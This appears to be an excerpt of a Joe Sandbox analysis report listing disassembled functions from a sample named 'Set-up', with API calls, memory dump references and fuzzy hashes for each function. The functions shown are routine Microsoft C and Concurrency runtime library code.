                                                                                              • Instruction ID: 4eec1975201ff10bb43b1f7732b2502c0c2a7c55fa9832678b5cdc1b575a4861
                                                                                              • Opcode Fuzzy Hash: 0b0f24113fdab93b5773abfe57f8926ef20ab0631efc6cc565ac2f638eb3783d
                                                                                              • Instruction Fuzzy Hash: 4D014034640189AFCF04DFA4E896DED3BB5EB45348F00405AE9159F290DB78EA458B84
                                                                                              Function 6BB98BCC Relevance: 10.5, APIs: 7, Instructions: 38threadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?), ref: 6BB98BE8
                                                                                              • GetCurrentThread.KERNEL32 ref: 6BB98BEB
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BF2
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BF5
                                                                                              • GetLastError.KERNEL32(?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98BFF
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000,?,6BB95C86,00000001), ref: 6BB98C17
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,6BBA0C55,?,6BBA0AF2,?,?,?,?,00000000), ref: 6BB98C25
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
                                                                                              • String ID:
                                                                                              • API String ID: 2881127307-0
                                                                                              • Opcode ID: bcac48fc4a96b1bf438404bdd9f5125bfc7a2729cb2236fa88830a0093af9418
                                                                                              • Instruction ID: 3c439d00ab948d528e1e054a8f2c7aae007ed91de2f4c8a9f4f7ea04c6d9c5d5
                                                                                              • Opcode Fuzzy Hash: bcac48fc4a96b1bf438404bdd9f5125bfc7a2729cb2236fa88830a0093af9418
                                                                                              • Instruction Fuzzy Hash: E6F09072900255AACE10AFB18C0AFAB3B6CEB45744F044565B611D3080DFBCE40487A1
                                                                                              Function 6BBDF612 Relevance: 9.3, APIs: 6, Instructions: 261COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 6BBDF713
                                                                                              • __FindPESection.LIBCMT ref: 6BBDF72D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                              • String ID:
                                                                                              • API String ID: 876702719-0
                                                                                              • Opcode ID: 65a2dbbad6bc0614295d2a45738af66a8b53c340a46fd0ba955812258b21235b
                                                                                              • Instruction ID: 3bc28faae56da0473df7a95e87f427b6d4c474900b164196c551abf9ac6580f1
                                                                                              • Opcode Fuzzy Hash: 65a2dbbad6bc0614295d2a45738af66a8b53c340a46fd0ba955812258b21235b
                                                                                              • Instruction Fuzzy Hash: 2091E531E086959FDB05CF58C84079D77F5EB85314F12426ED819AB390E73EE902CBA1
                                                                                              Function 6BB77402 Relevance: 9.2, APIs: 6, Instructions: 191COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: 0de324318477d4dc6c80569192b49f368d63830de8359b9e7cf98bb7e22c903d
                                                                                              • Instruction ID: bfe02c4165e6dc0ce962f37f03d90df45a728dba950b1dc0ea31d6a796f1cced
                                                                                              • Opcode Fuzzy Hash: 0de324318477d4dc6c80569192b49f368d63830de8359b9e7cf98bb7e22c903d
                                                                                              • Instruction Fuzzy Hash: FE51C8317453C0CBD731DB6EC4907897BA1DFA6718F6984AED0A48B242D3BAD907CB51
                                                                                              Function 6BB99F09 Relevance: 9.1, APIs: 6, Instructions: 145threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BB99F16
                                                                                              • TlsSetValue.KERNEL32(?), ref: 6BB99F29
                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 6BB9A08D
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9A0B2
                                                                                              • _CxxThrowException.MSVCR100(?,6BB9A0C8), ref: 6BB9A0C0
                                                                                              • std::exception::exception.LIBCMT(?,?,?,6BB9A0C8), ref: 6BB9A0E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Concurrency::unsupported_os::unsupported_osCurrentExceptionThreadThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1797647509-0
                                                                                              • Opcode ID: 2f55c189c8aab8fb0bbc74def986ad19cfe94862f6cd816f6ce638420642a421
                                                                                              • Instruction ID: a643ae701c11741d8c20771cbb681fc1d0a089f006fccf9d8d6cdf6715b248cc
                                                                                              • Opcode Fuzzy Hash: 2f55c189c8aab8fb0bbc74def986ad19cfe94862f6cd816f6ce638420642a421
                                                                                              • Instruction Fuzzy Hash: 7251F831A046C5AFDB05BF74D846BADBB71BF43308F0441B9D0555B292DB3EA81ACBA0
                                                                                              Function 6BB7153C Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 508512864-0
                                                                                              • Opcode ID: 54fbb8be210887e717b61343d9b84cb24f2803062b71bca9007cef20ae25fa0f
                                                                                              • Instruction ID: 04f26cc29384364d868329e69cf514d5046cc245ad75fcf78d9d4e9063a8ed5b
                                                                                              • Opcode Fuzzy Hash: 54fbb8be210887e717b61343d9b84cb24f2803062b71bca9007cef20ae25fa0f
                                                                                              • Instruction Fuzzy Hash: DA41F431A04795DFDB34AFA9C890A9EB7B6EF81760B28857ED43197280D77CD940CB50
                                                                                              Function 6BB6C106 Relevance: 9.1, APIs: 6, Instructions: 121COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock.MSVCR100(0000000B,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C12D
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • EnterCriticalSection.KERNEL32(?,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C1A8
                                                                                              • _lock.MSVCR100(0000000A,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C1FA
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB6C215
                                                                                              • _calloc_crt.MSVCR100(00000020,00000040,6BB6C170,00000018,6BB6C42D,00000000,?), ref: 6BB904BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Enter_lock$CountInitializeSpin_calloc_crt
                                                                                              • String ID:
                                                                                              • API String ID: 988982517-0
                                                                                              • Opcode ID: d05ee7998e32142065c6829041dd3fdce4512d75ba18bf2b6f8d09574ecfa793
                                                                                              • Instruction ID: 735f667827d49d6770e0b45889d0f12caad9927e4a1b0245f7b11f8c190bff3b
                                                                                              • Opcode Fuzzy Hash: d05ee7998e32142065c6829041dd3fdce4512d75ba18bf2b6f8d09574ecfa793
                                                                                              • Instruction Fuzzy Hash: C7411271D047918BDF208FA8C94479DBBF0AF467A4F148269D125AB2D0E7BCDE41CB61
                                                                                              Function 6BB651A2 Relevance: 9.1, APIs: 6, Instructions: 93COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00000001,?,?,?,?,6BB652A5,?,?,?), ref: 6BB651E5
                                                                                              • _memset.LIBCMT(00000000,00000000,00000000,?,?,?,6BB652A5,?,?,?,?,?,?,?,?,?), ref: 6BB6522B
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 6BB65240
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6BB6524E
                                                                                              • _freea_s.MSVCR100(00000000), ref: 6BB65258
                                                                                              • malloc.MSVCR100(00000008,?,?,?,6BB652A5,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB90CF1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$StringType_freea_s_memsetmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2935806426-0
                                                                                              • Opcode ID: 903f581ec0b8b6877970e5a377ce5b029af72863da8d9ae3bb9d1216424a1d12
                                                                                              • Instruction ID: 2b87d7f520b00111deeb77b60d17dcb154085b3d07542c47ae58812a4cba57e0
                                                                                              • Opcode Fuzzy Hash: 903f581ec0b8b6877970e5a377ce5b029af72863da8d9ae3bb9d1216424a1d12
                                                                                              • Instruction Fuzzy Hash: 8431917160068EAFEF008FA5DC80EAF7BA9FB09384F100466FA1497251E739DD608B64
                                                                                              Function 6BB6087F Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(?,?,?,6BB60936,?,?,00000000), ref: 6BB87946
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,6BB60936,?,?,00000000), ref: 6BB87950
                                                                                              • _errno.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB8795C
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87966
                                                                                              • _errno.MSVCR100(?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87972
                                                                                              • _errno.MSVCR100(?,?,?,?,?,6BB60936,?,?,00000000), ref: 6BB87991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2819658684-0
                                                                                              • Opcode ID: a17977ba85dbcc47a8b23e4869394747ab22ee759c5d6b0b65cf0a2db3916238
                                                                                              • Instruction ID: 5ed7de126eaf4707bde32a059efb1d8e716325cca860fbf5e24f9204b4955c87
                                                                                              • Opcode Fuzzy Hash: a17977ba85dbcc47a8b23e4869394747ab22ee759c5d6b0b65cf0a2db3916238
                                                                                              • Instruction Fuzzy Hash: AE213631250392EBD7285F3AC8C125E7361EF46798B60413EE5168B290F7B88C81C7D5
                                                                                              Function 6BB6921F Relevance: 9.1, APIs: 6, Instructions: 91COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB69260
                                                                                                • Part of subcall function 6BB62939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB6297D
                                                                                              • _towlower_l.MSVCR100(00000000,?,?,?,?,?,?), ref: 6BB69273
                                                                                              • _errno.MSVCR100(?), ref: 6BB8C4F8
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?), ref: 6BB8C503
                                                                                              • _errno.MSVCR100(?,?), ref: 6BB8C51E
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6BB8C529
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_towlower_l$iswctype
                                                                                              • String ID:
                                                                                              • API String ID: 3991495309-0
                                                                                              • Opcode ID: ad6b8cbdd590dbdcc39f1a482c8ba530fbeb129ac15480a7e1bfb79ff74d8a19
                                                                                              • Instruction ID: e8c3d28e42d5eb1185b406535510ba832676227362d41f6b63550515e7dfeef0
                                                                                              • Opcode Fuzzy Hash: ad6b8cbdd590dbdcc39f1a482c8ba530fbeb129ac15480a7e1bfb79ff74d8a19
                                                                                              • Instruction Fuzzy Hash: 6A3109B29001E59BDF208FA9C8827BD77A4EF42665F640389E4B09B1D5EB3CCD40D761
                                                                                              Function 6BB720BE Relevance: 9.1, APIs: 6, Instructions: 77COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strnicoll_l.MSVCR100(?,?,?,?,74DE8406,?,?,?,?,?,?), ref: 6BB72115
                                                                                                • Part of subcall function 6BB7204F: _strnicmp_l.MSVCR100(?,74DE8406,?,?,7FFFFFFF,00000000,00000000,?,74DE8406,?,?,?,?,?,?), ref: 6BB720A9
                                                                                              • _errno.MSVCR100(?,?,?,?,?,?), ref: 6BB8AAE4
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?), ref: 6BB8AAEF
                                                                                              • _errno.MSVCR100(74DE8406,?,?,?,?,?,?), ref: 6BB8AB0A
                                                                                              • _invalid_parameter_noinfo.MSVCR100(74DE8406,?,?,?,?,?,?), ref: 6BB8AB15
                                                                                              • __crtCompareStringA.MSVCR100(?,?,00001001,?,?,?,?,00000000,74DE8406,?,?,?,?,?,?), ref: 6BB8AB33
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo$CompareString__crt_strnicmp_l_strnicoll_l
                                                                                              • String ID:
                                                                                              • API String ID: 1477060370-0
                                                                                              • Opcode ID: 1551dbd58269ebbf61fa2de4000a7e092d805df93d9c55fe6efb24a3f35ca67f
                                                                                              • Instruction ID: 6768a26d0d7baebc9e13fc4fb00b9ae1e5ebfba4dcb57efe4e7504ee577cd0b9
                                                                                              • Opcode Fuzzy Hash: 1551dbd58269ebbf61fa2de4000a7e092d805df93d9c55fe6efb24a3f35ca67f
                                                                                              • Instruction Fuzzy Hash: 332153719102C9EFDF11AFB8C8819AD7BA5EF02324B1442A9F1305B1E5E7398A51DF51
                                                                                              Function 6BBA1D1A Relevance: 9.1, APIs: 6, Instructions: 74COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA1D5E
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA1D6E
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?), ref: 6BBA1D75
                                                                                                • Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BBA1DA3
                                                                                              • InitializeSListHead.KERNEL32(?), ref: 6BBA1DB8
                                                                                              • InitializeSListHead.KERNEL32(?), ref: 6BBA1DBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeadInitializeList$??2@_memsetmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2874038712-0
                                                                                              • Opcode ID: f952c2a348714ea27be9b936adea6a5a3d1f6039950b5c3d4193f82f3d055d34
                                                                                              • Instruction ID: a49b186410866dd0a1e1a82ab16172a0adc3af7f36b3888a597eadf602378aa5
                                                                                              • Opcode Fuzzy Hash: f952c2a348714ea27be9b936adea6a5a3d1f6039950b5c3d4193f82f3d055d34
                                                                                              • Instruction Fuzzy Hash: F0211AB1605B409FD364CF3EC981A16FBE8FF89310B545A1EE59AC7AA0D774E8418B14
                                                                                              Function 6BB780BC Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB780EF
                                                                                              • _calloc_crt.MSVCR100(00000001,00000002), ref: 6BB879E6
                                                                                              • _errno.MSVCR100 ref: 6BB879F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory_calloc_crt_errno
                                                                                              • String ID:
                                                                                              • API String ID: 1856998256-0
                                                                                              • Opcode ID: b9c38d3ad0c48bb102e9b62e3cd7dd9f32bbf071df3c059cfa86820d3c6571fe
                                                                                              • Instruction ID: 549da52de039442450ebe8858cba6f7cfc1b10516c0c76563850ff7d8513e340
                                                                                              • Opcode Fuzzy Hash: b9c38d3ad0c48bb102e9b62e3cd7dd9f32bbf071df3c059cfa86820d3c6571fe
                                                                                              • Instruction Fuzzy Hash: 5C213D72E403998FD730AF6ACC85B9D73B5DB45758F0141B9D51497280EBBC8E84CBA1
                                                                                              Function 6BB9D8E1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9D8E8
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000), ref: 6BB9D903
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,00000000), ref: 6BB9D913
                                                                                              • ??2@YAPAXI@Z.MSVCR100(000000F8,00000000), ref: 6BB9D921
                                                                                              • ??2@YAPAXI@Z.MSVCR100(000000D0,00000000), ref: 6BB9D951
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,00000000), ref: 6BB9D978
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@Policy$Concurrency@@ElementExceptionH_prolog3Key@2@@Policy@SchedulerThrowValue@std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 2052542019-0
                                                                                              • Opcode ID: 7b852d0adba21a6f17f49de36a1e5dc61b875297aa7de22b7f429ffc9113a26e
                                                                                              • Instruction ID: 928b131fbcc54f694ba178be3a3b0aa762924c1ac8f3eb8095bd2f9a53cc4241
                                                                                              • Opcode Fuzzy Hash: 7b852d0adba21a6f17f49de36a1e5dc61b875297aa7de22b7f429ffc9113a26e
                                                                                              • Instruction Fuzzy Hash: 0C11A771984196AADF55FFB6EC45BAE7BB4EF12394F400469A114F60A0EF3C8E04C760
                                                                                              Function 6BBA53E4 Relevance: 9.1, APIs: 6, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA53EB
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0), ref: 6BBA5440
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0), ref: 6BBA5447
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT(00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0,?), ref: 6BBA5454
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE24,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000), ref: 6BBA5462
                                                                                              • ??1event@Concurrency@@QAE@XZ.MSVCR100(00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?,?,?,6BBA55C8,?,00000000,6BBA5EC0,?), ref: 6BBA546E
